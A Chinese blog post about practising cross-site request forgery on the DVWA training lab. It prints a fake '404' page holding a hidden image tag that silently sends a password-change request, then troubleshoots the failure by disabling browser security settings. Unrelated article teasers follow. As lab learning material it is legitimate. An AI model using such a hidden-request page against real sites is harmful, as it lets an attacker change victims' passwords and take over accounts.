【渗透测试】|基于dvwa的CSRF初级，中级，高级

【渗透测试】|基于dvwa的CSRF初级，中级，高级

news/2024/9/20 7:55:48/文章来源:https://blog.csdn.net/yangdan_jiayou/article/details/139260891

一、渗透测试

二、渗透测试过程中遇到的问题和解决
在初级csrf中，想要通过伪造一个404页面，达到修改密码的效果
伪造404页面的html代码如下：

<html>
<head>
</head>
<body>
<img src="http://192.xx.xx.xx/dvwa/vulnerabilities/csrf/?password_new=1234567&password_conf=1234567&Change=Change#" border='0' style="display:none;"/>
<h1>404<h1>
<h2>file not foundww.<h2>
</body>
</html>

通过打开这个html，页面出现了404，但是密码并没有更改成功

直接通过http://192.xx.xx.xx/dvwa/vulnerabilities/csrf/?password_new=1234567&password_conf=1234567&Change=Change#，密码是可以更改成功的。

解决：关闭浏览器的一些安全设置，火狐浏览器如图:
在这里插入图片描述
解决过程：
通过html打开404页面时，发现cookie的secutiry 为 impossible，而直接在dvwa中修改密码的cookie的secutiry 为 low，两者的phpsessid也不一样，各种查资料，发现可能的浏览器的安全设置导致的。。。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/843912.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

mono3D任务FCOS3D: Fully Convolutional One-Stage Monocular 3D Object Detection

mono3D任务FCOS3D: Fully Convolutional One-Stage Monocular 3D Object Detection

数据 KITTI 在卡尔斯鲁厄采集的数据，包括雷达（64线束激光雷达）和摄像头（灰色彩色）。目标为pvb,场景包括农村、城市、高速。3D目标检测任务包含7481 训练图片和7518 测试图片包含80.256 标注目标。同时带有点云信息。…

阅读更多...

C++之类（class）的三种访问修饰符（public、private、protected）----成员变量与函数权限

C++之类（class）的三种访问修饰符（public、private、protected）----成员变量与函数权限

1、背景介绍在C中，类（class）的三种访问修饰符（access specifiers）用于控制类的成员（属性和方法）的访问权限。这些修饰符决定了类成员在类的外部是否可以被访问。以下是这三种访问修饰符的详细…

阅读更多...

深度学习-语言模型

深度学习-语言模型

深度学习-语言模型统计语言模型神经网络语言模型语言模型的应用序列模型（Sequence Model）语言模型（Language Model）序列模型和语言模型的区别语言模型（Language Model）是自然语言处理（NLP&…

阅读更多...

信息安全法规和标准

信息安全法规和标准

《全国人民代表大会常务委员会关于维护互联网安全的决定》规定，威胁互联网运行安全的行为：（1）侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统，（2）故意制作、传播计算机病毒等破坏性…

阅读更多...

Java 中BigDecimal传到前端后精度丢失问题

Java 中BigDecimal传到前端后精度丢失问题

1.用postman访问接口，返回的小数点精度正常 2.返回到页面里的，小数点丢失 3.解决办法，在字段上加注解 JsonFormat(shape JsonFormat.Shape.STRING) 或者 JsonSerialize(using ToStringSerializer.class) import com.fasterxml.jackson.a…

阅读更多...

SpringJDBC

SpringJDBC

1.前言 Spring JDBC可以帮助开发者节省大量开发工作自动去处理一些低级细节比如：异常处理、打开和关闭资源(Connection、PreparedStatement、Statement、ResultSet) 需要下载的jar包： spring-jdbc(普通jar包、源码jar包)由于没有依赖其他的jar包所以只…

阅读更多...

Echarts 实现线条绘制

Echarts 实现线条绘制

文章目录需求分析需求用 Echarts 实现如下效果分析

阅读更多...

【优选算法】分治 {三分快排：三指针优化，随机选key，快速选择算法；归并排序：统计数组中的逆序对，统计数组中的翻转对；相关编程题解析}

【优选算法】分治 {三分快排：三指针优化，随机选key，快速选择算法；归并排序：统计数组中的逆序对，统计数组中的翻转对；相关编程题解析}

一、经验总结 1.1 三分快排优化一：三指针优化之前学习的快速排序无法妥善处理相等或重复序列的排序问题（有序且三数取中无效），使快速排序的效率无法达到最优。为了解决重复序列的问题，我们将原先的双指针法&…

阅读更多...

云计算-无服务器计算与AWS Lambda (Serverless Computing with AWS Lambda)

云计算-无服务器计算与AWS Lambda (Serverless Computing with AWS Lambda)

AWS Lambda 无服务器计算与AWS Lambda AWS Lambda支持无服务器计算，不需要任何预配置和管理，同时还能最大限度地降低成本。我们将看到如何创建一个简单的Lambda函数，以及如何将其与AWS事件映射。在现实生活中，任何托管在线的应用…

阅读更多...

每天学点小知识：图床搭建 + CDN简介

每天学点小知识：图床搭建 + CDN简介

前言： 本章内容帮你解决，本地图片不能分享到网上的问题。需要工具github JSDelivr 知识点 Q：什么是JSDelivr？ JSDelivr是一个免费且公开的内容分发网络（CDN），专门用于加速开源项目和静态网站…

阅读更多...

构建php环境、安装、依赖、nginx配置、ab压力测试命令、添加php-fpm为系统服务

构建php环境、安装、依赖、nginx配置、ab压力测试命令、添加php-fpm为系统服务

目录 php简介官网php安装包选择下载稳定版本 （建议使用此版本，文章以此版本为例） 安装php解析环境准备工作安装依赖 zlib-devel 和 libxml2-devel包。安装扩展工具库安装 libmcrypt 安装 mhash 安装mcrypt 安装php 选项含…

阅读更多...

2024年软件设计师备考复习资料（应用技术）

2024年软件设计师备考复习资料（应用技术）

应用设计，考试时间为120分钟；总共需做5道题，满分75分（每题15分）。前4题为必答题，最后2题为要求选答一题（C或Java），45及格目录 1. 数据流图（需求分析&#…

阅读更多...

Python使用Modbus RTU发送数据的技术性指南

Python使用Modbus RTU发送数据的技术性指南

目录一、引言二、Modbus RTU协议简介三、Pymodbus库介绍四、环境准备五、编写Modbus RTU客户端代码六、案例分析七、注意事项与调试技巧八、扩展功能与应用九、性能优化与安全性考虑十、总结一、引言在工业自动化领域中，Modbus协议因其开放性…

阅读更多...

opencascade AIS_Circle AIS_ColoredDrawer AIS_CameraFrustum 源码学习圆

opencascade AIS_Circle AIS_ColoredDrawer AIS_CameraFrustum 源码学习圆

类AIS_Circle 构造圆形基准面，用于构建复合形状。 AIS_Circle() [1/2] AIS_Circle::AIS_Circle ( const Handle< Geom_Circle > & aCircle ) 初始化用于构造 AIS 圆形基准面的算法，并初始化圆形 aCircle。 AIS_Circle() [2/2] AIS_Circ…

阅读更多...

数据库系统概论（个人笔记）（第三部分）

数据库系统概论（个人笔记）（第三部分）

数据库系统概论（个人笔记） 文章目录数据库系统概论（个人笔记）3、SQL介绍3.1 SQL查询语言概述3.2 SQL数据定义3.3 SQL查询的基本查询结构3.4 其他基本操作3.5 设置操作3.6 空值3.7 聚合函数3.8 嵌套子查询3.9 数据库的修改 3、SQL…

阅读更多...

LES物流执行系统，在离散制造行业有那些作用和价值？

LES物流执行系统，在离散制造行业有那些作用和价值？

离散制造企业往往面临的是多品种、小批量的非标订单生产，传统推动式物流系统已经无法应对计划变化滞后，各车间、工序之间难以衔接等情况，特别是密集劳动力的电子行业，非标产品 SKU 种类繁多，物料配送复杂，对…

阅读更多...

【Flowable 7】学习笔记 01 - 初始化数据库表创建流程（源码）

【Flowable 7】学习笔记 01 - 初始化数据库表创建流程（源码）

文章目录前言版本说明配置1、引擎配置初始化2、SQL 执行创建表2.0、创建表概览（创建表数目：38）2.1、基础组件表创建（以 common 组件为例）2.2、changelog 组件表创建（基于 liquibase）2.3、Engin…

阅读更多...

探索机器人智能设备：开启智慧生活新篇章

探索机器人智能设备：开启智慧生活新篇章

机器人智能设备作为科技创新的代表，正以其独特的魅力吸引着越来越多的关注。它们不仅具备高度的智能化和自主化能力，还能在各种场景下发挥出强大的功能。机器人智能设备的张总说：在智能家居领域，机器人智能设备可以帮助我们实现家…

阅读更多...

计算机网络导论

计算机网络导论

网络结构的演变网状结构最开始的网络，主机之间都是两两相连好处这样连接，好处是安全性比较高（A与B之间的连线断了，可以绕一下C）； 另外通信不需要互相等待（没有中间交换设备，所…

阅读更多...

头文件大小写引发的报错

头文件大小写引发的报错

jenkins下打包编译报错如下，提示编译zynqCan.c时找不到“syscfgpll/sysCfgpll.h”文件。但IDE下编译是没有报错也没有警告的，工程中也存在文件“syscfgpll/sysCfgPll.h”。仔细观察发现，报错说的是找不到头文件“syscfgpll/sysCfgpll.h”…

阅读更多...

推荐文章

最新文章